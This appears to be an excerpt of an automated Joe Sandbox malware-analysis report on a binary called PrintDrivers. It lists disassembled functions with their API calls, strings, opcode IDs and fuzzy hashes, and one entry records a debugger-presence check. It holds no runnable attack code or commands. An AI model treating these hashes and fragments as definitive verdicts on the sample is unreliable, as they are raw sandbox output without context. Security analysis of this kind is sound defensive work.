• Instruction Fuzzy Hash: 1FD19E31D0426A8EEF25DB68C8597BCBFB6BF51310F54409DE889AB282DF354C85CB50
APIs
• __startOneArgErrorHandling.LIBCMT ref: 005B29BD
Strings
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: e052afca7cbd1b2ff3fb4d74d1c945f721f922e14079768a705175699426d046
• Instruction ID: 491683a92afbbf3e5a60d8e8d5fc3fb960f3f4c4a6623c774ba5ebaad7317dea
• Opcode Fuzzy Hash: e052afca7cbd1b2ff3fb4d74d1c945f721f922e14079768a705175699426d046
• Instruction Fuzzy Hash: F6519D71A086069ADB167B14CD063FA7F90FB50700F204D29F499822E9EB74ACC8EB57
APIs
Strings
Similarity
• API ID: __aulldiv
• String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
• API String ID: 3732870572-1956417402
• Opcode ID: 3c5322d5e70628d459b8313d7f4d52eb98350d30f382c786e86119687cd720cc
• Instruction ID: d7e213af08c345b4652b19ed34235aa5104a9d5a90afda83067a0ca5aa02b793
• Opcode Fuzzy Hash: 3c5322d5e70628d459b8313d7f4d52eb98350d30f382c786e86119687cd720cc
• Instruction Fuzzy Hash: 0051CE74A14349AFDF298EA88495FBEBFB9BF4A300F1444AAE491D7241D3748D438F61
Strings
Similarity
• API ID:
• String ID: \\?\$\\?\UNC\
• API String ID: 0-3019864461
• Opcode ID: 612529b0a0848965a5368749960aa90dfaa30016645ed7e546972bfc8b53123c
• Instruction ID: 34f4e68ede3c05cebe4964ba24b563fd7a47b72d4fd74a0397ad67ba358f2e31
• Opcode Fuzzy Hash: 612529b0a0848965a5368749960aa90dfaa30016645ed7e546972bfc8b53123c
• Instruction Fuzzy Hash: C151C570A00209DBDB14EF64D889BEEBFB5FF98304F10451EE911B7291DB75A984CBA4
APIs
Strings
Similarity
• API ID: H_prolog3__swprintf
• String ID: %.0Lf
• API String ID: 971793590-1402515088
• Opcode ID: dd877ba80684419b35a0db012c953ed1eac6062902c6b5ee65ecf9f61e9e954d
• Instruction ID: 0f01af3ac6ab02047e3666a0bad15f629b1d9263f7b5bb21865bc44ded75ba1d
• Opcode Fuzzy Hash: dd877ba80684419b35a0db012c953ed1eac6062902c6b5ee65ecf9f61e9e954d
• Instruction Fuzzy Hash: 0C517C72D00209ABCF05EFD4D849ADD7FB9FF48300F204419F846AB2A1DB399959CB90
APIs
• EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005A848E
Strings
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: 36fec967928da152497e63aded9023765899d8a109de2ffa1b82f153bf34ca57
• Instruction ID: 1f717227bf01bd58d43256a530c3c8be6e80c78a4f23ce8ee0caaf4bf84abd05
• Opcode Fuzzy Hash: 36fec967928da152497e63aded9023765899d8a109de2ffa1b82f153bf34ca57
• Instruction Fuzzy Hash: F3413771D0020AAFCF16DF98CC85AAEBFB5FF49304F148159F91867261E7359A50DB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3___cftoe
                                                                    • String ID: !%x
                                                                    • API String ID: 855520168-1893981228
                                                                    • Opcode ID: c77200ab97471c5d091ca75f2dee3b04e615c0781ad1c7847e13ff18baefafe2
                                                                    • Instruction ID: 1b383f7a2537aeae22f9908bcf28e913d36aa75b82516b39cf72c514987042f2
                                                                    • Opcode Fuzzy Hash: c77200ab97471c5d091ca75f2dee3b04e615c0781ad1c7847e13ff18baefafe2
                                                                    • Instruction Fuzzy Hash: DB313771D1024DABCF04EF94E885AEEBBB9FF48304F100429F504E7252E735AA55CB64
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3___cftoe
                                                                    • String ID: !%x
                                                                    • API String ID: 855520168-1893981228
                                                                    • Opcode ID: cd011dbeeef0f33e75eaaa846553c7383544c8a553f03c37b0a485961a338155
                                                                    • Instruction ID: 5112052f7e56fad0dfad2f87daead293d140944eeb259eff92ec40d1a8286e2c
                                                                    • Opcode Fuzzy Hash: cd011dbeeef0f33e75eaaa846553c7383544c8a553f03c37b0a485961a338155
                                                                    • Instruction Fuzzy Hash: 9D31537191424AAFDF05EF98E885EEEBFB5FF49308F140019F841A7242D778AA45CB64
                                                                    APIs
                                                                    • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00585C76
                                                                    • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,F3F544E4), ref: 00585CE5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ConvertFreeLocalString
                                                                    • String ID: Invalid SID
                                                                    • API String ID: 3201929900-130637731
                                                                    • Opcode ID: 91dc01df8379995659e4742b5c5d7f9028aa8fd0fdbd5c850c92d8ba97215596
                                                                    • Instruction ID: f20c5e07f025203315d3b86ddf4ef9d72155db2610ef0696ed03e955442498a4
                                                                    • Opcode Fuzzy Hash: 91dc01df8379995659e4742b5c5d7f9028aa8fd0fdbd5c850c92d8ba97215596
                                                                    • Instruction Fuzzy Hash: 08215EB4A046059FDB109F58C819BAFBBF8FB44704F14491EE902A7680E7B5AA058BD0
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058865B
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005886BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 3988782225-1405518554
                                                                    • Opcode ID: b85569a865b8623417062126d4760e89fc7f3373942ac1dc36147e61e08eec99
                                                                    • Instruction ID: 3f8e14cf7068e754f0cc1ab869596e2d666943c21e01fd8c752e47098fecc191
                                                                    • Opcode Fuzzy Hash: b85569a865b8623417062126d4760e89fc7f3373942ac1dc36147e61e08eec99
                                                                    • Instruction Fuzzy Hash: DE21AE70805784EED721CF68C904B8ABFF4AB19714F148A9ED49597782D3B5AA04CBA1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID: $\
                                                                    • API String ID: 269201875-2177588144
                                                                    • Opcode ID: 1d50bc880929c18c25c0ac31f7f64e24110d88afc0a095b57a9c5933bf09d314
                                                                    • Instruction ID: 8845e424a850c3c69e44786245b847879ef3df3c27b8d9b6fb8b4d846a105ce9
                                                                    • Opcode Fuzzy Hash: 1d50bc880929c18c25c0ac31f7f64e24110d88afc0a095b57a9c5933bf09d314
                                                                    • Instruction Fuzzy Hash: B6F0C8334083156EE7112B65AC46FE77FA8FBC17B4F24003AF94C9A042EA663C0185F1
                                                                    APIs
                                                                      • Part of subcall function 0058FCC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,F3F544E4,?,005C5B00,000000FF), ref: 0058FCE5
                                                                      • Part of subcall function 0058FCC0: GetLastError.KERNEL32(?,00000000,F3F544E4,?,005C5B00,000000FF), ref: 0058FCEF
                                                                    • IsDebuggerPresent.KERNEL32(?,?,005DC044), ref: 00590768
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,005DC044), ref: 00590777
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00590772
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 450123788-631824599
                                                                    • Opcode ID: ac8089a769c1f559984e93d4aed32a206ce6ccaccc364e3b708a13dd7764c114
                                                                    • Instruction ID: e5b0f9487f7050a5ae6e35a911ff4bbe503245f76d6cff333c365392f5b777f7
                                                                    • Opcode Fuzzy Hash: ac8089a769c1f559984e93d4aed32a206ce6ccaccc364e3b708a13dd7764c114
                                                                    • Instruction Fuzzy Hash: 3DE06D742007528FC760AFB4D84CB827EE4FF14714F04891DE886D2680EBB4E808CB92
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,00000004,?,?,00583204,?,?), ref: 00582039
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,00000004,?,?,00583204,?,?), ref: 00582059
                                                                    • LocalFree.KERNEL32(?,?), ref: 005820AF
                                                                    • HeapAlloc.KERNEL32(?,00000000,?,F3F544E4,?,005C5B00,000000FF), ref: 005820FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AllocLocal$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2162915748-0
                                                                    • Opcode ID: 5299815bbdfdd0ef9aaabc0531de89eb7320ea2944b0d59f54e04373f3e6b463
                                                                    • Instruction ID: fd4b5bf6e134f3d684344924a20daea3a241115cabb871989484e767f2557da7
                                                                    • Opcode Fuzzy Hash: 5299815bbdfdd0ef9aaabc0531de89eb7320ea2944b0d59f54e04373f3e6b463
                                                                    • Instruction Fuzzy Hash: 4441E872600605DFC710AF64D88CA6ABFE9FB85360F24462AF926D7291DB319844C760